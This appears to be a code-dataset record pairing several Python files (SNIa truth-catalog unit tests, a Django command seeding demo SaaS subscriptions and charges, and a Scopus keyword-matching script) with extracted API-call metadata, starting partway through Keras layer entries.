MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2646, 2751), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(512)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=512, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2652, 2751), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2766, 2791), 'keras.layers.UpSampling2D', 'UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (2778, 2791), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2813, 2832), 'keras.layers.Concatenate', 'Concatenate', ([], {'axis': '(3)'}), '(axis=3)\n', (2824, 2832), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2862, 2977), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(512)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=512, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (2877, 2977), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2996, 3111), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(256)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=256, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3011, 3111), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3127, 3152), 'keras.layers.UpSampling2D', 'UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (3139, 3152), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3176, 3195), 'keras.layers.Concatenate', 'Concatenate', ([], {'axis': '(3)'}), '(axis=3)\n', (3187, 3195), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3225, 3340), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(256)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=256, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3240, 3340), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3359, 3474), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(128)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=128, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3374, 3474), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3490, 3515), 'keras.layers.UpSampling2D', 'UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (3502, 3515), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3539, 3558), 'keras.layers.Concatenate', 'Concatenate', ([], {'axis': '(3)'}), '(axis=3)\n', (3550, 3558), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3588, 3703), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(128)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=128, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3603, 3703), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3722, 3836), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3737, 3836), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3852, 3877), 'keras.layers.UpSampling2D', 'UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (3864, 3877), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3901, 3920), 'keras.layers.Concatenate', 'Concatenate', ([], {'axis': '(3)'}), '(axis=3)\n', (3912, 3920), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3950, 4064), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3965, 4064), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((4083, 4197), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (4098, 4197), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((4216, 4312), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': 'input_shape[2]', 'kernel_size': '(1)', 'padding': '"""same"""', 'activation': '"""sigmoid"""'}), "(filters=input_shape[2], kernel_size=1, padding='same',\n activation='sigmoid')\n", (4231, 4312), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n')] |
"""
Unit tests for SNIa truth catalog code.
"""
import os
import unittest
import sqlite3
import numpy as np
import pandas as pd
from desc.sims_truthcatalog import SNeTruthWriter, SNSynthPhotFactory
class SNSynthPhotFactoryTestCase(unittest.TestCase):
"""
Test case class for SNIa synthetic photometry factory class.
"""
def test_SNSythPhotFactory(self):
"""
Test some flux calculations using the underlying SNObject
and SyntheticPhotometry classes.
"""
sp_factory = SNSynthPhotFactory(z=0.6322702169418335,
t0=61719.9950436545,
x0=4.2832710977804034e-06,
x1=-1.207738485943195,
c=-0.0069750402968899936,
snra=55.26407314527358,
sndec=-40.81575605788344)
mjds = (61689.150791, 61697.354470, 61712.258685)
bands = ('z', 'i', 'r')
fluxes = (2.6401569864737633, 71.18561504923377, 1048.0327802379868)
for mjd, band, flux in zip(mjds, bands, fluxes):
sp = sp_factory.create(mjd)
self.assertAlmostEqual(sp.calcFlux(band), flux)
class SNeTruthWriterTestCase(unittest.TestCase):
"""
Test case class for SNIa truth catalog generation class.
"""
def setUp(self):
self.outfile = 'test_sne_truth_cat.db'
self.data_dir = os.path.join(os.environ['SIMS_TRUTHCATALOG_DIR'],
'data')
sn_db_file = os.path.join(self.data_dir,
'sne_cosmoDC2_v1.1.4_MS_DDF_small.db')
self.sne_truth_writer = SNeTruthWriter(self.outfile, sn_db_file)
def tearDown(self):
if os.path.isfile(self.outfile):
os.remove(self.outfile)
def test_truth_summary(self):
"""Test that the truth_summary columns are filled out as expected."""
self.sne_truth_writer.write()
with sqlite3.connect(self.outfile) as conn:
df = pd.read_sql('select * from truth_summary', conn)
zeros = np.zeros(len(df))
ones = np.ones(len(df))
np.testing.assert_equal(df['is_variable'], ones)
np.testing.assert_equal(df['is_pointsource'], ones)
for band in 'ugrizy':
flux_col = f'flux_{band}'
np.testing.assert_equal(df[flux_col], zeros)
flux_col += '_noMW'
np.testing.assert_equal(df[flux_col], zeros)
def test_auxiliary_truth(self):
"""
Test that the columns from the sne_params table are transcribed
correctly.
"""
self.sne_truth_writer.write_auxiliary_truth()
with sqlite3.connect(self.outfile) as conn:
df = pd.read_sql('select * from sn_auxiliary_info', conn)
np.testing.assert_equal(self.sne_truth_writer.sne_df['snid_in'],
df['id'].to_numpy())
np.testing.assert_equal(self.sne_truth_writer.sne_df['galaxy_id'],
df['host_galaxy'].to_numpy())
np.testing.assert_equal(self.sne_truth_writer.sne_df['snra_in'],
df['ra'].to_numpy())
np.testing.assert_equal(self.sne_truth_writer.sne_df['t0_in'],
df['t0'].to_numpy())
np.testing.assert_equal(self.sne_truth_writer.sne_df['z_in'],
df['redshift'].to_numpy())
def test_variability_truth(self):
"""
Test some expected values for a SNIa in the test SNe catalog
using a small opsim db table.
"""
opsim_db_file = os.path.join(self.data_dir,
'minion_1016_desc_dithered_v4_small.db')
self.sne_truth_writer.write_variability_truth(opsim_db_file,
max_rows=60)
with sqlite3.connect(self.outfile) as conn:
df = pd.read_sql('select * from sn_variability_truth', conn)
my_object = 'MS_10195_1375'
self.assertIn(my_object, df['id'].to_list())
my_df = df.query(f'id == "{my_object}"')
for visit in (1425850, 1433860, 1495410):
self.assertIn(visit, my_df['obsHistID'].to_list())
if __name__ == '__main__':
unittest.main()
| [
"numpy.testing.assert_equal",
"sqlite3.connect",
"desc.sims_truthcatalog.SNSynthPhotFactory",
"os.path.join",
"os.path.isfile",
"unittest.main",
"pandas.read_sql",
"desc.sims_truthcatalog.SNeTruthWriter",
"os.remove"
]
| [((4369, 4384), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4382, 4384), False, 'import unittest\n'), ((524, 720), 'desc.sims_truthcatalog.SNSynthPhotFactory', 'SNSynthPhotFactory', ([], {'z': '(0.6322702169418335)', 't0': '(61719.9950436545)', 'x0': '(4.2832710977804034e-06)', 'x1': '(-1.207738485943195)', 'c': '(-0.0069750402968899936)', 'snra': '(55.26407314527358)', 'sndec': '(-40.81575605788344)'}), '(z=0.6322702169418335, t0=61719.9950436545, x0=\n 4.2832710977804034e-06, x1=-1.207738485943195, c=-0.0069750402968899936,\n snra=55.26407314527358, sndec=-40.81575605788344)\n', (542, 720), False, 'from desc.sims_truthcatalog import SNeTruthWriter, SNSynthPhotFactory\n'), ((1496, 1553), 'os.path.join', 'os.path.join', (["os.environ['SIMS_TRUTHCATALOG_DIR']", '"""data"""'], {}), "(os.environ['SIMS_TRUTHCATALOG_DIR'], 'data')\n", (1508, 1553), False, 'import os\n'), ((1612, 1678), 'os.path.join', 'os.path.join', (['self.data_dir', '"""sne_cosmoDC2_v1.1.4_MS_DDF_small.db"""'], {}), "(self.data_dir, 'sne_cosmoDC2_v1.1.4_MS_DDF_small.db')\n", (1624, 1678), False, 'import os\n'), ((1745, 1785), 'desc.sims_truthcatalog.SNeTruthWriter', 'SNeTruthWriter', (['self.outfile', 'sn_db_file'], {}), '(self.outfile, sn_db_file)\n', (1759, 1785), False, 'from desc.sims_truthcatalog import SNeTruthWriter, SNSynthPhotFactory\n'), ((1822, 1850), 'os.path.isfile', 'os.path.isfile', (['self.outfile'], {}), '(self.outfile)\n', (1836, 1850), False, 'import os\n'), ((2231, 2279), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (["df['is_variable']", 'ones'], {}), "(df['is_variable'], ones)\n", (2254, 2279), True, 'import numpy as np\n'), ((2288, 2339), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (["df['is_pointsource']", 'ones'], {}), "(df['is_pointsource'], ones)\n", (2311, 2339), True, 'import numpy as np\n'), ((3718, 3786), 'os.path.join', 'os.path.join', (['self.data_dir', '"""minion_1016_desc_dithered_v4_small.db"""'], {}), "(self.data_dir, 'minion_1016_desc_dithered_v4_small.db')\n", (3730, 3786), False, 'import os\n'), ((1864, 1887), 'os.remove', 'os.remove', (['self.outfile'], {}), '(self.outfile)\n', (1873, 1887), False, 'import os\n'), ((2052, 2081), 'sqlite3.connect', 'sqlite3.connect', (['self.outfile'], {}), '(self.outfile)\n', (2067, 2081), False, 'import sqlite3\n'), ((2108, 2156), 'pandas.read_sql', 'pd.read_sql', (['"""select * from truth_summary"""', 'conn'], {}), "('select * from truth_summary', conn)\n", (2119, 2156), True, 'import pandas as pd\n'), ((2420, 2464), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (['df[flux_col]', 'zeros'], {}), '(df[flux_col], zeros)\n', (2443, 2464), True, 'import numpy as np\n'), ((2509, 2553), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (['df[flux_col]', 'zeros'], {}), '(df[flux_col], zeros)\n', (2532, 2553), True, 'import numpy as np\n'), ((2773, 2802), 'sqlite3.connect', 'sqlite3.connect', (['self.outfile'], {}), '(self.outfile)\n', (2788, 2802), False, 'import sqlite3\n'), ((2829, 2881), 'pandas.read_sql', 'pd.read_sql', (['"""select * from sn_auxiliary_info"""', 'conn'], {}), "('select * from sn_auxiliary_info', conn)\n", (2840, 2881), True, 'import pandas as pd\n'), ((3973, 4002), 'sqlite3.connect', 'sqlite3.connect', (['self.outfile'], {}), '(self.outfile)\n', (3988, 4002), False, 'import sqlite3\n'), ((4029, 4084), 'pandas.read_sql', 'pd.read_sql', (['"""select * from sn_variability_truth"""', 'conn'], {}), "('select * from sn_variability_truth', conn)\n", (4040, 4084), True, 'import pandas as pd\n')] |
# Copyright (c) 2018, DjaoDjin inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime, logging, random
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db.utils import IntegrityError
from django.template.defaultfilters import slugify
from django.utils.timezone import utc
from saas.backends.razorpay_processor import RazorpayBackend
from saas.models import Plan, Transaction, get_broker
from saas.utils import datetime_or_now
from saas.settings import PROCESSOR_ID
LOGGER = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Load the database with random transactions (testing purposes).
"""
USE_OF_SERVICE = 0
PAY_BALANCE = 1
REDEEM = 2
REFUND = 3
CHARGEBACK = 4
WRITEOFF = 5
FIRST_NAMES = (
'Anthony',
'Alexander',
'Alexis',
'Alicia',
'Ashley',
'Benjamin',
'Bruce',
'Chloe',
'Christopher',
'Daniel',
'David',
'Edward',
'Emily',
'Emma',
'Ethan',
'Grace',
'Isabella',
'Jacob',
'James',
'Jayden',
'Jennifer',
'John',
'Julia',
'Lily',
'Lucie',
'Luis',
'Matthew',
'Michael',
'Olivia',
'Ryan',
'Samantha',
'Samuel',
'Scott',
'Sophia',
'Williom',
)
LAST_NAMES = (
'Smith',
'Johnson',
'Williams',
'Jones',
'Brown',
'Davis',
'Miller',
'Wilson',
'Moore',
'Taylor',
'Anderson',
'Thomas',
'Jackson',
'White',
'Harris',
'Martin',
'Thompson',
'Garcia',
'Martinez',
'Robinson',
'Clark',
'Rogriguez',
'Lewis',
'Lee',
'Walker',
'Hall',
'Allen',
'Young',
'Hernandez',
'King',
'Wright',
'Lopez',
'Hill',
'Green',
'Baker',
'Gonzalez',
'Nelson',
'Mitchell',
'Perez',
'Roberts',
'Turner',
'Philips',
'Campbell',
'Parker',
'Collins',
'Stewart',
'Sanchez',
'Morris',
'Rogers',
'Reed',
'Cook',
'Bell',
'Cooper',
'Richardson',
'Cox',
'Ward',
'Peterson',
)
def add_arguments(self, parser):
parser.add_argument('--provider',
action='store', dest='provider',
default=settings.SAAS['BROKER']['GET_INSTANCE'],
help='create sample subscribers on this provider')
def handle(self, *args, **options):
#pylint: disable=too-many-locals,too-many-statements
from saas.managers.metrics import month_periods # avoid import loop
from saas.models import (Charge, ChargeItem, Organization, Plan,
Subscription)
RazorpayBackend.bypass_api = True
now = datetime.datetime.utcnow().replace(tzinfo=utc)
from_date = now
from_date = datetime.datetime(
year=from_date.year, month=from_date.month, day=1)
if args:
from_date = datetime.datetime.strptime(
args[0], '%Y-%m-%d')
# Create a set of 3 plans
broker = get_broker()
Plan.objects.get_or_create(
slug='basic',
defaults={
'title': "Basic",
'description': "Basic Plan",
'period_amount': 24900,
'broker_fee_percent': 0,
'period_type': 4,
'advance_discount': 1000,
'organization': broker,
'is_active': True
})
Plan.objects.get_or_create(
slug='medium',
defaults={
'title': "Medium",
'description': "Medium Plan",
'period_amount': 24900,
'broker_fee_percent': 0,
'period_type': 4,
'organization': broker,
'is_active': True
})
Plan.objects.get_or_create(
slug='premium',
defaults={
'title': "Premium",
'description': "Premium Plan",
'period_amount': 18900,
'broker_fee_percent': 0,
'period_type': 4,
'advance_discount': 81,
'organization': broker,
'is_active': True
})
# Create Income transactions that represents a growing bussiness.
provider = Organization.objects.get(slug=options['provider'])
processor = Organization.objects.get(pk=PROCESSOR_ID)
for end_period in month_periods(from_date=from_date):
nb_new_customers = random.randint(0, 9)
for _ in range(nb_new_customers):
queryset = Plan.objects.filter(
organization=provider, period_amount__gt=0)
plan = queryset[random.randint(0, queryset.count() - 1)]
created = False
trials = 0
while not created:
try:
first_name = self.FIRST_NAMES[random.randint(
0, len(self.FIRST_NAMES)-1)]
last_name = self.LAST_NAMES[random.randint(
0, len(self.LAST_NAMES)-1)]
full_name = '%s %s' % (first_name, last_name)
slug = slugify('demo%d' % random.randint(1, 1000))
customer, created = Organization.objects.get_or_create(
slug=slug, full_name=full_name)
#pylint: disable=catching-non-exception
except IntegrityError:
trials = trials + 1
if trials > 10:
raise RuntimeError(
'impossible to create a new customer after 10 trials.')
Organization.objects.filter(pk=customer.id).update(
created_at=end_period)
subscription = Subscription.objects.create(
organization=customer, plan=plan,
ends_at=now + datetime.timedelta(days=31))
Subscription.objects.filter(
pk=subscription.id).update(created_at=end_period)
# Insert some churn in %
churn_rate = 2
all_subscriptions = Subscription.objects.filter(
plan__organization=provider)
nb_churn_customers = (all_subscriptions.count()
* churn_rate // 100)
subscriptions = random.sample(list(all_subscriptions),
all_subscriptions.count() - nb_churn_customers)
for subscription in subscriptions:
nb_periods = random.randint(1, 6)
transaction_item = Transaction.objects.new_subscription_order(
subscription, nb_natural_periods=nb_periods,
created_at=end_period)
if transaction_item.dest_amount < 50:
continue
transaction_item.orig_amount = transaction_item.dest_amount
transaction_item.orig_unit = transaction_item.dest_unit
transaction_item.save()
charge = Charge.objects.create(
created_at=transaction_item.created_at,
amount=transaction_item.dest_amount,
customer=subscription.organization,
description='Charge for %d periods' % nb_periods,
last4=1241,
exp_date=datetime_or_now(),
processor=processor,
processor_key=str(transaction_item.pk),
# XXX We can't do that yet because of
# ``PROCESSOR_BACKEND.charge_distribution(self)``
# unit=transaction_item.dest_unit,
state=Charge.CREATED)
charge.created_at = transaction_item.created_at
charge.save()
ChargeItem.objects.create(
invoiced=transaction_item, charge=charge)
charge.payment_successful()
churned = all_subscriptions.exclude(
pk__in=[subscription.pk for subscription in subscriptions])
for subscription in churned:
subscription.ends_at = end_period
subscription.save()
self.stdout.write("%d new and %d churned customers at %s" % (
nb_new_customers, nb_churn_customers, end_period))
| [
"logging.getLogger",
"datetime.datetime",
"saas.models.Transaction.objects.new_subscription_order",
"saas.utils.datetime_or_now",
"datetime.datetime.utcnow",
"saas.managers.metrics.month_periods",
"datetime.datetime.strptime",
"saas.models.Organization.objects.filter",
"saas.models.ChargeItem.objects.create",
"saas.models.Organization.objects.get",
"datetime.timedelta",
"saas.models.Plan.objects.filter",
"saas.models.get_broker",
"saas.models.Organization.objects.get_or_create",
"saas.models.Subscription.objects.filter",
"random.randint",
"saas.models.Plan.objects.get_or_create"
]
| [((1800, 1827), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1817, 1827), False, 'import datetime, logging, random\n'), ((4443, 4511), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'from_date.year', 'month': 'from_date.month', 'day': '(1)'}), '(year=from_date.year, month=from_date.month, day=1)\n', (4460, 4511), False, 'import datetime, logging, random\n'), ((4682, 4694), 'saas.models.get_broker', 'get_broker', ([], {}), '()\n', (4692, 4694), False, 'from saas.models import Plan, Transaction, get_broker\n'), ((4703, 4949), 'saas.models.Plan.objects.get_or_create', 'Plan.objects.get_or_create', ([], {'slug': '"""basic"""', 'defaults': "{'title': 'Basic', 'description': 'Basic Plan', 'period_amount': 24900,\n 'broker_fee_percent': 0, 'period_type': 4, 'advance_discount': 1000,\n 'organization': broker, 'is_active': True}"}), "(slug='basic', defaults={'title': 'Basic',\n 'description': 'Basic Plan', 'period_amount': 24900,\n 'broker_fee_percent': 0, 'period_type': 4, 'advance_discount': 1000,\n 'organization': broker, 'is_active': True})\n", (4729, 4949), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((5109, 5332), 'saas.models.Plan.objects.get_or_create', 'Plan.objects.get_or_create', ([], {'slug': '"""medium"""', 'defaults': "{'title': 'Medium', 'description': 'Medium Plan', 'period_amount': 24900,\n 'broker_fee_percent': 0, 'period_type': 4, 'organization': broker,\n 'is_active': True}"}), "(slug='medium', defaults={'title': 'Medium',\n 'description': 'Medium Plan', 'period_amount': 24900,\n 'broker_fee_percent': 0, 'period_type': 4, 'organization': broker,\n 'is_active': True})\n", (5135, 5332), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((5476, 5726), 'saas.models.Plan.objects.get_or_create', 'Plan.objects.get_or_create', ([], {'slug': '"""premium"""', 'defaults': "{'title': 'Premium', 'description': 'Premium Plan', 'period_amount': 18900,\n 'broker_fee_percent': 0, 'period_type': 4, 'advance_discount': 81,\n 'organization': broker, 'is_active': True}"}), "(slug='premium', defaults={'title': 'Premium',\n 'description': 'Premium Plan', 'period_amount': 18900,\n 'broker_fee_percent': 0, 'period_type': 4, 'advance_discount': 81,\n 'organization': broker, 'is_active': True})\n", (5502, 5726), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((5972, 6022), 'saas.models.Organization.objects.get', 'Organization.objects.get', ([], {'slug': "options['provider']"}), "(slug=options['provider'])\n", (5996, 6022), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((6043, 6084), 'saas.models.Organization.objects.get', 'Organization.objects.get', ([], {'pk': 'PROCESSOR_ID'}), '(pk=PROCESSOR_ID)\n', (6067, 6084), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((6111, 6145), 'saas.managers.metrics.month_periods', 'month_periods', ([], {'from_date': 'from_date'}), '(from_date=from_date)\n', (6124, 6145), False, 'from saas.managers.metrics import month_periods\n'), ((4566, 4613), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['args[0]', '"""%Y-%m-%d"""'], {}), "(args[0], '%Y-%m-%d')\n", (4592, 4613), False, 'import datetime, logging, random\n'), ((6178, 6198), 'random.randint', 'random.randint', (['(0)', '(9)'], {}), '(0, 9)\n', (6192, 6198), False, 'import datetime, logging, random\n'), ((7904, 7960), 'saas.models.Subscription.objects.filter', 'Subscription.objects.filter', ([], {'plan__organization': 'provider'}), '(plan__organization=provider)\n', (7931, 7960), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((4352, 4378), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (4376, 4378), False, 'import datetime, logging, random\n'), ((6272, 6335), 'saas.models.Plan.objects.filter', 'Plan.objects.filter', ([], {'organization': 'provider', 'period_amount__gt': '(0)'}), '(organization=provider, period_amount__gt=0)\n', (6291, 6335), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((8282, 8302), 'random.randint', 'random.randint', (['(1)', '(6)'], {}), '(1, 6)\n', (8296, 8302), False, 'import datetime, logging, random\n'), ((8338, 8453), 'saas.models.Transaction.objects.new_subscription_order', 'Transaction.objects.new_subscription_order', (['subscription'], {'nb_natural_periods': 'nb_periods', 'created_at': 'end_period'}), '(subscription, nb_natural_periods\n =nb_periods, created_at=end_period)\n', (8380, 8453), False, 'from saas.models import Plan, Transaction, get_broker\n'), ((9527, 9594), 'saas.models.ChargeItem.objects.create', 'ChargeItem.objects.create', ([], {'invoiced': 'transaction_item', 'charge': 'charge'}), '(invoiced=transaction_item, charge=charge)\n', (9552, 9594), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((6989, 7055), 'saas.models.Organization.objects.get_or_create', 'Organization.objects.get_or_create', ([], {'slug': 'slug', 'full_name': 'full_name'}), '(slug=slug, full_name=full_name)\n', (7023, 7055), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((7421, 7464), 'saas.models.Organization.objects.filter', 'Organization.objects.filter', ([], {'pk': 'customer.id'}), '(pk=customer.id)\n', (7448, 7464), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((7709, 7756), 'saas.models.Subscription.objects.filter', 'Subscription.objects.filter', ([], {'pk': 'subscription.id'}), '(pk=subscription.id)\n', (7736, 7756), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((9113, 9130), 'saas.utils.datetime_or_now', 'datetime_or_now', ([], {}), '()\n', (9128, 9130), False, 'from saas.utils import datetime_or_now\n'), ((7664, 7691), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(31)'}), '(days=31)\n', (7682, 7691), False, 'import datetime, logging, random\n'), ((6920, 6943), 'random.randint', 'random.randint', (['(1)', '(1000)'], {}), '(1, 1000)\n', (6934, 6943), False, 'import datetime, logging, random\n')] |
import os, sys, re
import json
import pandas as pd
import pymongo
from main.LOADERS.publication_loader import PublicationLoader
from main.MONGODB_PUSHERS.mongodb_pusher import MongoDbPusher
from main.NLP.PREPROCESSING.preprocessor import Preprocessor
class ScopusStringMatch_HAmodule():
def __init__(self):
self.loader = PublicationLoader()
self.mongodb_pusher = MongoDbPusher()
self.preprocessor = Preprocessor()
def __progress(self, count, total, custom_text, suffix=''):
"""
Visualises progress for a process given a current count and a total count
"""
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '*' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s %s %s\r' %(bar, percents, '%', custom_text, suffix))
sys.stdout.flush()
def __read_keywords(self, data: dict) -> None:
"""
Given a set of publications in a dictionary, performs pre-processing for all string type data fields.
Performs look-up on HA keyword occurences in a document.
Results are pushed to MongoDB (backed-up in JSON file - scopus_matches.json).
"""
resulting_data = {}
counter = 0
keywords = self.preprocessor.preprocess_keywords("main/HA_KEYWORDS/HA_Keywords.csv")
num_publications = len(data)
num_keywords = len(keywords)
for doi, publication in data.items():
# visualise the progress on a commandline
self.__progress(counter, num_publications, "processing scopus_matches.json")
counter += 1
description = self.preprocessor.tokenize(publication["Description"])
ha_occurences = {} # accumulator for HA Keywords found in a given document
for n in range(num_keywords):
ha_num = n + 1
ha = "HA " + str(ha_num) if ha_num < num_keywords else "Misc" # clean and process the string for documenting occurences
ha_occurences[ha] = {"Word_Found": []}
for keyword in keywords[n]:
if keyword in description:
ha_occurences[ha]["Word_Found"].append(keyword)
if len(ha_occurences[ha]["Word_Found"]) == 0:
ha_occurences.pop(ha, None) # clear out empty occurences
resulting_data[doi] = {"DOI": doi, "Related_HA": ha_occurences}
print()
self.mongodb_pusher.matched_scopus(resulting_data) # push the processed data to MongoDB
print()
# Record the same data locally, acts as a backup
with open('main/NLP/STRING_MATCH/HA_MODULE_RESULTS/scopus_matches_modules.json', 'w') as outfile:
json.dump(resulting_data, outfile)
def run(self):
"""
Controller method for self class
Loads modules from a pre-loaded pickle file
"""
data = self.loader.load_all()
self.__read_keywords(data) | [
"main.MONGODB_PUSHERS.mongodb_pusher.MongoDbPusher",
"main.LOADERS.publication_loader.PublicationLoader",
"main.NLP.PREPROCESSING.preprocessor.Preprocessor",
"sys.stdout.flush",
"json.dump",
"sys.stdout.write"
]
